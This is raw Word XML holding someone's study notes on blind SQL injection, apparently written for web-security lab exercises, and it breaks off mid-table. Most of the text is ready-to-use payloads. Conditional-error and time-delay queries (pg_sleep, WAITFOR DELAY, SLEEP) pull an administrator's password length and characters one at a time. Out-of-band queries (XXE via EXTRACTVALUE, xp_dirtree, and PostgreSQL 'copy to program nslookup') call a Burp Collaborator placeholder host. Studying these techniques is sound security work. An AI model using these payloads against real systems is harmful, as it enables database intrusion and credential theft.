    <w:p w14:paraId="5A81042B" w14:textId="70C9B5F7" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="004D666C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB1B94" w14:textId="4835BF3A" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="005474B7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TrackingId=xyz'||(SELECT CASE WHEN </w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B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SUBSTR(password,1,1)='a'</w:t>
      </w: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 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D0F78F" w14:textId="0556B115" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00CC3B25" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124395B3" w14:textId="77777777" w:rsidR="004D666C" w:rsidRPr="00384A1B" w:rsidRDefault="004D666C" w:rsidP="004D666C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384A1B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Exploiting blind SQL injection by triggering time delays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8AA4EC" w14:textId="4FCC0602" w:rsidR="004D666C" w:rsidRPr="00384A1B" w:rsidRDefault="004D666C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no error could be caused</w:t>
      </w:r>
      <w:r w:rsidR="00267AF4" w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; trigger a delay when the condition is true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C13003" w14:textId="293E95EB" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>cause an unconditional time delay of 10 seconds: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391"/>
      </w:tblGrid>
      <w:tr w:rsidR="00267AF4" w:rsidRPr="00384A1B" w14:paraId="255EF478" w14:textId="77777777" w:rsidTr="00267AF4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="125BC8C5" w14:textId="77777777" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF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6631F3B3" w14:textId="77777777" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF4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dbms_pipe.receive_message(('a'),10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267AF4" w:rsidRPr="00384A1B" w14:paraId="41E9F08F" w14:textId="77777777" w:rsidTr="00267AF4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46D55C49" w14:textId="77777777" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF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Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02423B4F" w14:textId="77777777" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF4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WAITFOR DELAY '0:0:10'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267AF4" w:rsidRPr="00384A1B" w14:paraId="6EABB275" w14:textId="77777777" w:rsidTr="00267AF4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46BE73E5" w14:textId="77777777" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF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PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1370EFC9" w14:textId="77777777" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF4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SELECT pg_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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sleep(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00267AF4" w:rsidRPr="00384A1B" w14:paraId="2F14C208" w14:textId="77777777" w:rsidTr="00267AF4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BEA146F" w14:textId="77777777" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF4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6E1ECFBF" w14:textId="77777777" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"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 xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:proofErr w:type="gramStart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SLEEP(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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val="de-DE" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FAEAFDF" w14:textId="77777777" w:rsidR="004D666C" w:rsidRPr="00384A1B" w:rsidRDefault="004D666C" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63DB9336" w14:textId="58134258" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF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'; IF (1=2) WAITFOR DELAY '0:0:10'</w:t>
      </w:r>
      <w:r w:rsidR="00DD5CEF"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-- </w:t>
      </w:r>
      <w:r w:rsidR="00DD5CEF" w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>(URL-encode these)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1F9F55" w14:textId="6B9AFAF6" w:rsidR="00CC3B25" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF4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'; IF (1=1) WAITFOR DELAY '0:0:10'</w:t>
      </w:r>
      <w:r w:rsidR="00DD5CEF"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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB0D7F" w14:textId="026BDCA0" w:rsidR="00DD5CEF" w:rsidRPr="00384A1B" w:rsidRDefault="00DD5CEF" w:rsidP="00DD5CE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384A1B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'|| pg_sleep(10)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCE27D" w14:textId="34D920AA" w:rsidR="00DD5CEF" w:rsidRPr="00384A1B" w:rsidRDefault="00DD5CEF" w:rsidP="00267AF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1EC25D" w14:textId="46134712" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BCD170B" w14:textId="77777777" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00267AF4">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) &gt; 'm') = 1 WAITFOR DELAY '0:0:{delay}'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9A5CD8" w14:textId="78E8CC77" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00267AF4" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F8F721" w14:textId="6E07A96C" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00DD5CEF" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Check if username “administrator” exists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A445F96" w14:textId="435C0114" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00DD5CEF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TrackingId=x'; SELECT CASE WHEN (username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM</w:t>
      </w:r>
      <w:r w:rsidR="00265596" w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidR="00265596" w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40171CFE" w14:textId="29D40010" w:rsidR="00265596" w:rsidRPr="00384A1B" w:rsidRDefault="00265596" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45132594" w14:textId="5156090C" w:rsidR="00265596" w:rsidRPr="00384A1B" w:rsidRDefault="00265596" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine the length of “password”: </w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(only use 1 thread)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44B150" w14:textId="6A8E371A" w:rsidR="00265596" w:rsidRPr="00384A1B" w:rsidRDefault="00265596" w:rsidP="00265596">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>TrackingId=x'; SELECT CASE WHEN (username='administrator' AND LENGTH(password)=1) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2540DCB5" w14:textId="77777777" w:rsidR="00265596" w:rsidRPr="00384A1B" w:rsidRDefault="00265596" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02215392" w14:textId="3AF49B95" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="00265596" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack: </w:t>
      </w:r>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(only use 1 thread)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B64BC3" w14:textId="1213E712" w:rsidR="00265596" w:rsidRPr="00384A1B" w:rsidRDefault="00265596" w:rsidP="00265596">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>TrackingId=x'; SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,1,1)=’a’) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55017600" w14:textId="77777777" w:rsidR="00265596" w:rsidRPr="00384A1B" w:rsidRDefault="00265596" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA73908" w14:textId="77777777" w:rsidR="006D536A" w:rsidRPr="00384A1B" w:rsidRDefault="006D536A" w:rsidP="006D536A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384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Exploiting blind SQL injection using out-of-band (</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00384A1B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>OAST</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A871ABC" w14:textId="25970C8A" w:rsidR="00267AF4" w:rsidRPr="00384A1B" w:rsidRDefault="006D536A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no error, no time difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC8C64D" w14:textId="2DDBF02C" w:rsidR="002A1054" w:rsidRPr="00384A1B" w:rsidRDefault="002A1054" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699994C9" w14:textId="4E563FB3" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4B970" w14:textId="77777777" w:rsidR="002111C3" w:rsidRPr="00384A1B" w:rsidRDefault="002111C3" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr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511"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D7705" w:rsidRPr="00384A1B" w14:paraId="56BAE305" w14:textId="77777777" w:rsidTr="000D7705">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AFCAA02" w14:textId="77777777" w:rsidR="000D7705" w:rsidRPr="00384A1B" w:rsidRDefault="000D7705">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16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4A130530" w14:textId="6E775883" w:rsidR="000D7705" w:rsidRPr="00384A1B" w:rsidRDefault="000D7705">
            <w:pPr>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>The following technique leverages an XML external entity (</w:t>
            </w:r>
            <w:hyperlink r:id="rId7" w:history="1">
              <w:r w:rsidRPr="00384A1B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="FF6633"/>
                  <w:sz w:val="16"/>
                  <w:szCs w:val="16"/>
                </w:rPr>
                <w:t>XXE</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="002A1054" w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>UNION</w:t>
            </w:r>
            <w:r w:rsidR="002A1054" w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
                <w:color w:val="333332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384A1B">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>SELECT EXTRACTVALUE(xmltype('&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"&gt; %remote;]&gt;'),'/l') FROM dual</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>The following technique works on fully patched Oracle installations, but requires elevated privileges:</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D7705" w:rsidRPr="00384A1B" w14:paraId="0F44333D" w14:textId="77777777" w:rsidTr="000D7705">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AA415D3" w14:textId="77777777" w:rsidR="000D7705" w:rsidRPr="00384A1B" w:rsidRDefault="000D7705">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63E625C7" w14:textId="77777777" w:rsidR="000D7705" w:rsidRPr="00384A1B" w:rsidRDefault="000D7705">
            <w:pPr>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D7705" w:rsidRPr="00384A1B" w14:paraId="413AC915" w14:textId="77777777" w:rsidTr="000D7705">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="466E6CDF" w14:textId="77777777" w:rsidR="000D7705" w:rsidRPr="00384A1B" w:rsidRDefault="000D7705">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15538C51" w14:textId="77777777" w:rsidR="000D7705" w:rsidRPr="00384A1B" w:rsidRDefault="000D7705">
            <w:pPr>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D7705" w:rsidRPr="00384A1B" w14:paraId="10B8EE22" w14:textId="77777777" w:rsidTr="000D7705">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0740F350" w14:textId="77777777" w:rsidR="000D7705" w:rsidRPr="00384A1B" w:rsidRDefault="000D7705">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr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61C2FEE1" w14:textId="77777777" w:rsidR="000D7705" w:rsidRPr="00384A1B" w:rsidRDefault="000D7705">
            <w:pPr>
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>The following techniques work on Windows only:</w:t>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00384A1B">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
                <w:color w:val="333332"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
